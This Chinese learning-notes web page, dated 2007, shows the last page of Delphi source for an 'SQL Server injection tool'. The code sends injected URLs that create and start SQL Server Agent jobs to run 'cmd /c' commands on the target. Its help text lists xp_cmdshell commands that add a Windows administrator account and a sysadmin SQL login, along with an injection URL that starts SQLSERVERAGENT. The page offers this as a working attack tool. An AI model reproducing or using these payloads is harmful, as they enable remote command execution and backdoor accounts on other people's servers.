SQL Server注入工具 1.0_Sql Server_学习笔记★闵涛★计算机学习电脑编程软硬件技巧


	转至繁体中文版	\| 网站首页 \| 图文教程 \| 资源下载 \| 站长博客 \| 图片素材 \| 武汉seo \| 武汉网站优化 \|

SQL Server注入工具 1.0

作者：闵涛文章来源：闵涛的学习笔记点击数：3953 更新时间：2007/11/14 12:57:01

nbsp;   '''';exec%20sp_add_job%20''''''''x''''''''''''+
                         '''';exec%20sp_add_jobstep%20Null,''''''''x'''''''',Null,''''''''1'''''''',''''''''CMDEXEC'''''''',''''''''cmd%20/c%20''''+
                         CommandStr+'''''''''''';exec%20sp_add_jobserver%20Null,''''''''x'''''''',@@servername''''+
                         '''';exec%20sp_start_job%20''''''''x''''''''--'''';
        if get(CommandStr) then
          Memo2.Lines.Add(''''命令执行完成。'''');
      end else
      begin
        Memo2.Lines.Add(''''SQLSERVERAGENT 启动失败，操作终止！'''');
        exit;
      end;
    end;
finally
    Screen.Cursor :=crDefault;
    BtnExecute.Visible :=true;
    BtnCancel.Visible :=false;
end;
end;

function TForm1.Get(URL: string): boolean;
var
IDHTTP: TIDHttp;
ss: String;
begin
Result:= False;
IDHTTP:= TIDHTTP.Create(nil);
try
    try
      idhttp.HandleRedirects:= true;                //必须支持重定向否则可能出错
      idhttp.ReadTimeout:= 30000;                   //超过这个时间则不再访问
      ss:= IDHTTP.Get(URL);
      if IDHTTP.ResponseCode=200 then
        Result :=true;
    except
      //on E: Exception do
      // Application.MessageBox(pchar(''''出现异常，操作终止！''''+#10#13+E.Message),''''提示'''',mb_ok+mb_iconinformation);
    end;
finally
    IDHTTP.Free;
end;
end;

function TForm1.GetWBMsg(URL: string): string;
function GetResultStr(str:string):string;
var
    istart,iend:integer;
    ss:string;
begin
    istart:=pos(''''|'''',str);
    if istart>0 then
    begin
      ss:=copy(str,istart+1,length(str)-istart);
      iend :=pos(''''|'''',ss);
      if iend>0 then
      begin
        ss:=copy(ss,1,iend-1);
      end;
    end;
    if ss='''''''' then
      Result :=''''未知''''
    else Result :=ss;
end;
var
ss:string;
begin
tag:=0;
wb.Navigate(URL);
while (tag=0) do
    Application.ProcessMessages;
ss :=(wb.Document as IHTMLDocument2).Body.innerText;
Result :=GetResultStr(ss);
end;

function TForm1.StrToNChar(DbName, TName: string): string;
var
i:integer;
ss,str:string;
begin
ss:=DbName+''''..''''+TName;
for i:=1 to length(ss) do
begin
    if i=1 then
      str :=''''NCHAR(''''+inttostr(ord(ss[i]))+'''')''''
    else
      str :=str+''''%2BNCHAR(''''+inttostr(ord(ss[i]))+'''')'''';
end;
Result :=''''OBJECT_ID(''''+str+'''')'''';
end;

procedure TForm1.wbDocumentComplete(Sender: TObject;
const pDisp: IDispatch; var URL: OleVariant);
begin
//Memo2.Text :=(wb.Document as IHTMLDocument2).Body.innerText;
tag:=1;
end;

procedure TForm1.BtnStopClick(Sender: TObject);
begin
isFinish :=True;
BtnCheck.Visible :=true;
BtnStop.Visible :=False;
end;

procedure TForm1.SetRdbCheck(rd: TRadioButton);
begin
Memo2.Clear;
if rd=rbCmd then
begin
    cbDisp.Enabled :=True;
    Memo2.Lines.Add(''''使用xp_cmdshell来运行系统命令'''');
    Memo2.Lines.Add('''''''');
    Memo2.Lines.Add(''''net user test test /add'''');
    Memo2.Lines.Add(''''net localgroup administrators test /add'''');
    Memo2.Lines.Add(''''exec master..sp_addlogin test,test'''');
    Memo2.Lines.Add(''''exec master..sp_addsrvrolemember test,sysadmin'''');
end;
if rd=rbOA then
begin
    cbDisp.Enabled :=False;
    Memo2.Lines.Add(''''使用sp_OACreate来运行系统命令'''');
end;
if rd=rbJob then
begin
    cbDisp.Enabled :=False;
    Memo2.Lines.Add(''''使用SQLSERVERAGENT的JOB来运行系统命令'''');
    Memo2.Lines.Add(''''请先使用下列语句启动SQLSERVERAGENT:'''');
    Memo2.Lines.Add('''''''');
    Memo2.Lines.Add(''''http://x.com/x.asp?a=1;exec master..xp_servicecontrol ''''''''start'''''''',''''''''SQLSERVERAGENT'''''''';--'''');
end;
end;

procedure TForm1.rbCmdClick(Sender: TObject);
begin
SetRdbCheck(rbcmd);
end;

procedure TForm1.rbOAClick(Sender: TObject);
begin
SetRdbCheck(rbOA);
end;

procedure TForm1.rbJobClick(Sender: TObject);
begin
SetRdbCheck(rbJob);
end;

procedure TForm1.FormShow(Sender: TObject);
begin
SetRdbCheck(rbcmd);
end;

procedure TForm1.BtnCancelClick(Sender: TObject);
begin
isCancel :=True;
BtnExecute.Visible :=true;
BtnCancel.Visible :=false;
end;

end.

上一页 [1] [2] [3] [4]

[Access]sql随机抽取记录  [Access]ASP&SQL让select查询结果随机排序的实现方法
[聊天工具]企业邮件系统的利器----FoxMail Server  [系统软件]OPEN SERVER 5.0.5安装EXP300阵列柜
[系统软件]SQL语句性能优化--LECCO SQL Expert  [系统软件]关于Windows2000Server的灾难恢复
[常用软件][网络]下载服务革命性风暴Poco Server评测  [C语言系列]动态创建SQL Server数据库、表、存储过程等架构信…
[C语言系列]SQL Server到DB2连接服务器的实现  [C语言系列]SQL Server到SYBASE连接服务器的实现

教程录入：mintao 责任编辑：mintao

上一篇教程：在注册表中删除MSSQL无用的数据库注册

下一篇教程：为ASP.NET封装的SQL数据库访问类

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

注：本站部分文章源于互联网，版权归原作者所有！如有侵权，请原作者与本站联系，本站将立即删除！本站文章除特别注明外均可转载，但需注明出处！ [MinTao学以致用网]

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

同类栏目

· Sql Server  · MySql
· Access  · ORACLE
· SyBase  · 其他

热门推荐

没有教程

赞助链接

闵涛博文

500 - 内部服务器错误。

您查找的资源存在问题，因而无法显示。

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18

闵涛站盟:医药大全-武穴网。A打造B、C、D……